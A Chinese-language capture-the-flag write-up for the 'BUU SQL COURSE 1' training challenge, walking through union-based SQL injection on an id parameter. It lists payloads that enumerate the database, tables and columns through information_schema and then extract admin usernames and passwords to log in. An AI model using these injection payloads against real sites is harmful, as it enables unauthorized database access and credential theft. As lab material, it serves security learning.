BUU SQL COURSE 1

发现有登录框,爆破半天也爆破不出来,只能从别的地方下手了

F12一下

发现了一个传参

进去发现id可以传参,sql注入一下试试

前三个都有回显,当id=4的时候页面没有回显了,正好验证 了页面 有三个新闻

当order by =3的时候又没有回显了,这时可以判断有2个字段

当我们查询显错位的时候,发现页面没有变化,考虑到是不是过滤了什么

?id=-1 union select 1,2

于是在传参点把1改为-1 就可以看到页面有回显了

?id=-1 union select 1,database() 查库名

查表名

?id=-1 union select 1,table_name from information_schema.tables where table_schema='news'

查字段 ?id=-1 union select 1,column_name from information_schema.columns where table_name='admin'

这不是我们要的字段,我们要找的是username 和password

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit0,1

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1

查数据

?id=-1 union select 1,username from admin limit 0,1

?id=-1 union select 1,password from admin limit 0,1

拿着账号密码去登录

登录成功 flag就出来了

相关推荐
TDengine (老段)5 小时前
TDengine 数学函数 DEGRESS 用户手册
大数据·数据库·sql·物联网·时序数据库·iot·tdengine
TDengine (老段)5 小时前
TDengine 数学函数 GREATEST 用户手册
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
安当加密5 小时前
云原生时代的数据库字段加密:在微服务与 Kubernetes 中实现合规与敏捷的统一
数据库·微服务·云原生
爱喝白开水a6 小时前
LangChain 基础系列之 Prompt 工程详解:从设计原理到实战模板_langchain prompt
开发语言·数据库·人工智能·python·langchain·prompt·知识图谱
想ai抽6 小时前
深入starrocks-多列联合统计一致性探查与策略(YY一下)
java·数据库·数据仓库
武子康6 小时前
Java-152 深入浅出 MongoDB 索引详解 从 MongoDB B-树 到 MySQL B+树 索引机制、数据结构与应用场景的全面对比分析
java·开发语言·数据库·sql·mongodb·性能优化·nosql
longgyy6 小时前
5 分钟用火山引擎 DeepSeek 调用大模型生成小红书文案
java·数据库·火山引擎
ytttr8737 小时前
C# 仿QQ聊天功能实现 (SQL Server数据库)
数据库·oracle·c#
盒马coding7 小时前
第18节-索引-Partial-Indexes
数据库·postgresql
不剪发的Tony老师8 小时前
CloudDM:一站式数据库开发管理工具
数据库